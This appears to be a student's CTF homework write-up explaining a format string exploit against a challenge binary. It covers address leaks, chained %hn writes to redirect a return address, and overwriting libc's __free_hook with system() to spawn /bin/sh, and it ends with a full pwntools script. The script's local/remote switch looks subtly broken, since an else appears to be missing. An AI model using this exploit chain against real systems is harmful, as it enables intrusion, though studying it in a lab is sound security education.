Homework 10a Writeup (without giveup())
Dec 18, 2023

A Quick Look

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Sums up every CTF challenge so far emoji

As a rule of thumb we will run checksec on the binary:

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Looks scary emoji

The vulnerability could be easily found in the source code if you’re using the clangd lauguage server in your editor:

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It reads the “name of the snack” into a buffer in the heap then printfs it as the format string itself. It appears to be an easy format string attack challenge. We will try some generic payloads:

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Looks like we got some addresses on the stack to bypass ASLR emoji. Now we have to figure out how to do our abritrary write, so that we can overwrite the GOT entry of a libc function with the address of system().

Where did my payload go emoji

Let’s run it on gdb and see what the stack looks like when we enter our payload:

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The text we entered is nowhere to be found on the stack. But we can see a pointer to our payload AAAA... on the heap. If we look back at the source code, we can see that the buffer string is allocated on the heap using malloc().

But in order to execute an abritrary write using format strings (and the %n format specifier), the address to be written is specified at an argument, meaning it must also be on the stack. If we tried use fmtstr_payload() from pwntools, it will just write to the location pointed by some pointers on the stack.

How about the name buffer at the start of the program? Can we put the target addresses into it? It is indeed stored on the stack, but before we can leak our address from the buffer to bypass ASLR. If we manage to modify it after we leak the address, then we could do the abritrary write. But how?

Is there a good way to return to the ctf_simulator function, without calling giveup()? Well, to control the flow, we could only overwrite either a GOT entry, or the return address of the function at rbp+1. Back to square one emoji

Chaining the overwrites

A trick I learned from the MIPS ROP challenge is to make use of the existing values on the stack which are deterministic. In this case it means we can utilize those pointer values to control another value on the stack. For example, the value at rbp (0x7fffffffd650) refers to the saved rbp (rbp + 0x120), which points to the base of the previous stack frame. What if we used the format string exploit with the pointer at rbp? The value at base of the previous stack frame (which also is a pointer to the stack) get overwritten.

[rbp] (8th arg)  -> rbp + 0x120
(Stack frame of ctf_simulator())
[rbp + 0x120]     -> 0x7fffffffd780

Let’s try overwriting it with the format specifier %1c%8$hn (writing 0x0001 to the address pointed by the 8th argument):

[rbp + 0x120] -> 0x7fffffff0001

We have another address on the stack, differing from the previous by the lower bytes (first two bytes in memory). What makes it even better is that we can just make it point to rbp+1, by just altering those two bytes with %54872c%10$hn:

[rbp + 0x120] -> 0x7fffffffd658 = rbp + 1

(The exact value of rbp can be calculated using the leaked stack address from earlier)

Now we have a pointer to the return address (rbp + 1) on the stack! Using it as the argument to the format string exploit, we can overwrite the return address with ctf_simulator using the same trick:

[rbp + 1]     -> ctf_simulator()
[rbp + 0x120] -> rbp + 1

Now the program will ask us for the team name again once the get_snack function exits.

Full RELRO… or not?

Now that we had our abritary overwrite using the name buffer, we can use the leaked address from earlier to calculate the address of the GOT table, and leak the address of puts() in memory with %10$s, thus obtaining the address of system():

However there is a problem: the binary is compiled with full RELRO, meaning the GOT table is read-only. We can’t simply overwrite any GOT entry with the address of system(). But if we’re lucky and the LIBC version on the server is older, there’s a chance the LIBC calls a function pointer __free_hook (which can be user defined) when freeing chunks on the heap.

We can check the LIBC version using https://libc.blukat.me/ with our leaked address:

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The LIBC version is older than 2.34, so we can use the __free_hook trick and overwrite it with the address of system() emoji. We’ll use the name buffer again, since the output of fmtstr_payload() has to be on the stack.

One last thing is to get system() to be called with the argument /bin/sh. But since whatever is being freed is also passed to __free_hook, which in this case happenes to be buffer, we can just put /bin/sh as the name of our snack.


  1. Leak the base address of the binary and the saved RBP
  2. Using two format string exploits, overwrite the return address of the get_snacks() call with ctf_simulator
  3. Leak the address of puts() by setting name to puts@GOT and calculate the address of system()
  4. Return to ctf_simulator again, set __free_hook to the address of system()
  5. Enter /bin/sh as the name of the snack, wait for buffer to be freed and cat flag.txt
import sys

from pwn import *  # type: ignore

mode = 'l'
if len(sys.argv) > 1:
    mode = sys.argv[1]

e = ELF('./ctf_sim')
libc = ELF('./libc.so.6')
context.binary = e

if mode == 'r':
    p = connect('chal.firebird.sh', 35048)
    p = process([e.path])


def ret_to_ctf():
    # after leaking rbp and setting e.address

    # rbp $8 -> rbp+0x120 $44 -> rbp+0x130
    # make rbp+0x120 point to return address (rbp+8)
    p.sendlineafter(b'option: ', b'3')
    payload = '%{}c%{}$hn'.format((rbp + 8) & 0xffff, 8)
    p.sendlineafter(b'today? ', payload)

    # edit return address to start of ctf_simulator
    p.sendlineafter(b'option: ', b'3')
    payload = '%{}c%{}$hn'.format(e.sym['ctf_simulator'] + 15 & 0xffff, 44)
    p.sendlineafter(b'today? ', payload)

# Leak RBP of ctf_simulator & Return address
p.sendlineafter(b'option: ', b'3')
p.sendlineafter(b'today? ', b'%8$payo%9$pez')
rbp = int(p.recvuntil('ayo', drop=True).strip(), 16) - 0x120
ret = int(p.recvuntil('ez', drop=True).strip(), 16)
print('RBP: ', hex(rbp))
print('Return address: ', hex(ret))
# Set the base address of ELF
e.address = ret - e.sym['ctf_simulator'] - 166


# Leak puts
p.sendlineafter(b'option: ', b'3')
p.sendlineafter(b'today? ', b'%10$sAAAA')
puts = unpack(p.recvuntil('AAAA', drop=True), 'all')
print('PUTS: ', hex(puts))
libc.address = puts - libc.sym['puts']
hook = libc.sym['__free_hook']
print('HOOK: ', hex(hook))

# Overwrite __free_hook with system
payload = fmtstr_payload(10, {hook: libc.sym['system']})

p.sendlineafter(b'option: ', b'3')
p.sendlineafter(b'today? ', payload)
p.sendlineafter(b'option: ', b'3')
p.sendlineafter(b'today? ', '/bin/sh\x00')